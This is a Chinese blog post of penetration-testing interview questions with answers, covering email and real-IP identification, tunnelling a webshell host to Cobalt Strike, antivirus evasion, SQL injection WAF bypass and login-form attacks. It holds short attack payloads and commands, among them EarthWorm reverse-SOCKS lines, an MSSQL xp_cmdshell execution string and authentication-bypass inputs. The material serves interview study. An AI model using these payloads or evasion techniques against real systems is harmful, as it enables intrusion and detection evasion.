当前位置: 首页 > ai >正文

2025年渗透测试面试题总结-30(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、邮箱类型判断

二、真实IP确认方法

三、不出网机器上线CS

四、代理工具与杀软对抗

五、免杀技术核心思路

六、SQL注入Bypass技巧

七、红队HW信息收集

八、Whois信息内容

九、登录框攻击面

十、Python/PHP在渗透中的用途

二百五十一、如何判断邮箱类型二百五十二、如何确定你拿到的就是真实ip二百五十三、机器不出网如何上线到cs(不出网的机器是拿到wenshell的机器)二百五十四、走代理用哪些工具,遇到杀软怎么办二百五十五、如何免杀二百五十六、sql注入bypass有哪些(尽可能多说)二百五十七、平常红队hw信息收集方式有哪些二百五十八、whois 收集的信息包括哪些二百五十九、给一个登录框能想到哪些利用方式二百六十、平常开发经常用python 和php做什么

一、邮箱类型判断

  1. 域名分析
    • 企业邮箱:域名与公司官网一致(如 user@company.com
    • 公共邮箱:@gmail.com@qq.com
    • 自建邮箱:MX记录指向私有IP或非知名邮件服务商
  2. SMTP响应特征
    • 连接25/465端口,通过HELO命令返回服务标识(如Exchange、Postfix)
  3. 邮件头解析
    • 检查 Received: 字段中的服务器路径和中间件类型(如 X-Mailer: Sendmail

二、真实IP确认方法

  1. 网络层验证
    • 使用 traceroute 观察最后一跳IP
    • 检查TCP/IP数据包TTL值是否与宣称系统匹配
  2. 协议级检测
    • HTTP请求:对比 X-Forwarded-For 与TCP连接IP
    • SSL证书关联:扫描IP的443端口证书是否绑定目标域名
  3. 第三方平台验证
    • 通过Shodan/Censys搜索IP历史绑定记录
    • 利用CDN识别工具(如cdnchecker.com

三、不出网机器上线CS

前提:已获取Webshell但目标无外网连接

mermaidgraph LR A[Webshell] --> B[上传代理工具] B --> C[建立内网隧道] C --> D[通过可控节点转发流量]
  1. 工具选择
    • reGeorg+Proxychains(HTTP隧道)
    • EarthWorm(SOCKS5反向代理)
  2. 关键步骤
    • 在可控公网服务器启动监听(ew -s rcsocks -l 1080 -e 8888
    • 从不出网机器反向连接:ew -s rssocks -d <公网IP> -e 8888
    • 配置CS监听器指向本地SOCKS代理

四、代理工具与杀软对抗

代理类型推荐工具免杀策略
HTTP隧道reGeorg, Tiny自定义响应头+流量AES加密
SOCKS5EarthWorm, Neo-reGeorg协议混淆(如伪装成SSL流量)
DNS隧道dnscat2使用TXT记录+长域名分割传输
对抗要点
  • 内存加密(如Cobalt Strike的Secure Profile
  • 流量特征修改(JA3指纹伪造)
  • 进程注入(注入到svchost.exe 等系统进程)

五、免杀技术核心思路

  1. 代码层面
    • Shellcode加密(AES/RC4)+ 运行时解密
    • API动态调用(通过Hash检索函数地址)
  2. 加载方式
    • 进程空洞(Process Hollowing)
    • 反射型DLL注入
  3. 行为伪装
    • 签名劫持(LOLBins)
    • 合法进程注入(如利用msbuild.exe 执行C#载荷)

六、SQL注入Bypass技巧

WAF绕过类

sql/*!50000SELECT*/ 1,2,3 -- MySQL内联注释 SEL%0bECT 1,2,3 -- 空白符分割(%0b为垂直制表符) UNION ALL SELECT 1,2,3 -- 等价替换

过滤绕过类

  • 大小写/双写:uNIoN sELecTuniUNIONon selSELECTect
  • 编码转换:CHAR(65,66,67) 代替 'ABC'
  • 参数污染:id=1&id=2' and 1=1--

数据库特性利用

  • MySQL:/*!50000CONCAT*/(@@version)
  • MSSQL:DECLARE @a VARCHAR(50)=%27EXEC master..xp_cmdshell%27; EXEC(@a+%27whoami%27)

共整理37种Bypass手法(篇幅限制未全列),重点:理解WAF解析差异+数据库特性


七、红队HW信息收集

  1. 被动情报
    • Whois/备案查询 → 关联子公司和IP段
    • GitHub敏感信息扫描(API密钥、内部文档)
  2. 主动探测
    • 全端口扫描(Masscan)+ 服务识别(Nmap -sV)
    • 子域名爆破(*.target.com
  3. 社会工程
    • 员工领英信息 → 制作钓鱼字典
    • 公开招标文件 → 获取内部系统名称

八、Whois信息内容

json{ "注册人": "姓名/组织(可能匿名)", "联系方式": "邮箱/电话(需验证)", "域名服务器": "NS1.xxx.com, NS2.xxx.com", "注册日期": "2020-01-01", "过期日期": "2025-12-31", "IP关联": "历史解析记录(通过APNIC数据库反查)" }

注意:GDPR可能导致欧洲域名信息隐藏


九、登录框攻击面

  1. 认证绕过
    • SQL注入:admin'--
    • Cookie篡改:admin=1; role=superuser
  2. 凭证相关
    • 暴力破解(Burp Intruder)
    • 密码重置逻辑漏洞(如修改接收邮箱)
  3. 后端漏洞
    • LDAP注入:*)(&
    • JWT密钥破解(jwt_tool)
  4. 前端风险
    • XSS存储型 → 窃取Cookie
    • CSRF → 强制修改密码

十、Python/PHP在渗透中的用途

语言典型场景常用库/框架
Python漏洞PoC编写(Requests+BeautifulSoup)Scapy(流量伪造)、PyInstaller(打包)
C2开发(Flask/Socket)Pwntools(二进制利用)
PHPWebshell编写(蚁剑/冰蝎连接)Guzzle(HTTP代理穿透)
CMS漏洞利用(WordPress插件审计)PHP-FFI(调用系统API)

案例

  • Python自动化信息收集:subprocess调用Nmap+解析XML报告
  • PHP内存马:通过php://input注入恶意路由到正常应用
http://www.xdnf.cn/news/18587.html

相关文章:

  • 【从零开始学习Redis】如何设计一个秒杀业务
  • Java全栈工程师面试实录:从基础到微服务的深度探索
  • 埃氏筛|树dfs|差分计数
  • UE5.5 C++ 增强输入 快速上手
  • 恶劣天气下漏检率↓79%!陌讯多模态时序融合算法在道路事故识别的实战优化
  • 淘宝API实战应用:数据驱动商品信息实时监控与增长策略
  • DBeaver连接SQL Server时添加驱动后仍提示找不到驱动的解决方法
  • 51c自动驾驶~合集18
  • 学习记录(二十一)-Overleaf中图片文字间隔太大怎么办
  • java学习 + 一个向前端传流顺序不一致的一个解决思路
  • ubuntu中的nginx.conf和windows中的nginx.conf内容对比
  • 从栈到堆:深入理解C语言静态与动态链表的创建与管理
  • Flutter性能优化完全指南:构建流畅应用的实用策略
  • 如何安全解密受限制的PDF文件
  • [二维前缀和]1277. 统计全为 1 的正方形子矩阵
  • 【线性代数】常见矩阵类型
  • RandAR训练自己的数据集
  • ARINC 825板卡的应用
  • C++---双指针
  • Hyperledger Fabric官方中文教程-改进笔记(十五)-从通道中删除组织
  • Adobe CS6所有系列绿色免安装版,Photoshop 6 Adobe Illustrator CS6 等绿色版
  • 283. 移动零
  • 阿里云拉取dockers镜像
  • Wireshark USRP联合波形捕获(下)
  • 【Linux】Java线上问题,一分钟日志定位
  • 2024年CSP-S认证 CCF信息学奥赛C++ 中小学提高组 第一轮真题讲解 完善程序题解析
  • 面试题及解答:掌握Linux下常用性能分析工具
  • 使用Python实现DLT645-2007智能电表协议
  • 基于php的萌宠社区网站的设计与实现、基于php的宠物社区论坛的设计与实现
  • 【QT入门到晋级】进程间通信(IPC)-共享内存